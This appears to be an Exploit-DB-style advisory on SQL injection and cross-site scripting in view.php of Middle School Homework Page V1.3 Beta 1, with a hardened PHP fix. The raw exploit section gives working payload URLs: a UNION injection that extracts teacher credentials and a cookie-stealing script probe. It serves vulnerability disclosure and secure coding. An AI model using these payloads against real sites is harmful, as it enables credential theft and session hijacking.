Vendor: Middle School Homework Page
By: AtT4CKxT3rR0r1ST
CVSS: 8.8 HIGH
SQL Injection & Cross Site Scripting
CWE: 89 (SQL Injection) & 79 (Cross-site Scripting)
Product Name: Middle School Homework Page
Affected Version From: V1.3 Beta 1
Affected Version To: V1.3 Beta 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Middle School Homework Page V1.3 Beta 1 – Multiple Vulnerabilities

The SQL injection vulnerability exists in the view.php file, where the class request parameter is placed into an SQL query (as the classID value) without being properly sanitized. An attacker can exploit it by sending a malicious SQL query to the application in that parameter. The cross-site scripting vulnerability also exists in view.php, where the class parameter is not properly sanitized before being used in HTML output. An attacker can exploit it by sending a malicious script to the application.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being executed. Input validation should also be used to prevent malicious scripts from being executed.
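
A hardened form of the view.php lookup, as an added example that is not the project's own code. It assumes PDO with the SQLite driver and an in-memory schema with constructed rows; the helper name class_heading is hypothetical.

```php
<?php
// Added example, not code from Middle School Homework Page. Assumes pdo_sqlite.
// Table and column names follow the advisory; the rows are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE class (classID INTEGER PRIMARY KEY, classDesc TEXT)');
$db->exec('CREATE TABLE teachinfo (name TEXT, pass TEXT)');
$db->exec("INSERT INTO class VALUES (1, 'Math <7th grade>')");
$db->exec("INSERT INTO teachinfo VALUES ('teacher1', 'constructed-hash')");

// Hypothetical helper: returns the HTML-escaped class description, or null.
function class_heading(PDO $db, $raw): ?string
{
    // 1. Validate: classID is numeric, so accept only a positive integer.
    //    Arrays and non-numeric strings make filter_var() return false.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind the value instead of interpolating it into the SQL text.
    $stmt = $db->prepare('SELECT classDesc FROM class WHERE classID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $desc = $stmt->fetchColumn();
    if ($desc === false) {
        return null;
    }
    // 3. Encode for the HTML context at the point of output.
    return htmlspecialchars((string) $desc, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// One valid id, then the two class values from the advisory (URL-decoded).
$inputs = [
    '1',
    'null and 1=2 union select 1,concat(name,0x3a,pass) from teachinfo',
    '<script>alert(document.cookie);</script>',
];
foreach ($inputs as $raw) {
    $heading = class_heading($db, $raw);
    echo $heading === null ? "rejected\n" : "<h2>Homework for {$heading}</h2>\n";
}
```

Integer validation alone rejects both advisory inputs, but the bound parameter and the output encoding remain necessary: the stored classDesc value is itself untrusted data when it reaches the HTML.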

Exploit-DB raw data:

Middle School Homework Page V1.3 Beta 1  - Multiple Vulnerabilities
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/mshwpage/
####################################################################

I. Sql Injection

##############
VULNERABILITY
##############
/view.php (line 3-4)
-----------------------------------------------------------------------------

<h2>Homework for <?php get_array("select * from class where
classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j
G:i:s T Y");echo $today; ?>:</h2>
<?php

-----------------------------------------------------------------------------

#########
EXPLOIT
#########
(
localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo


II. Cross Site Scripting

localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script>

####################################################################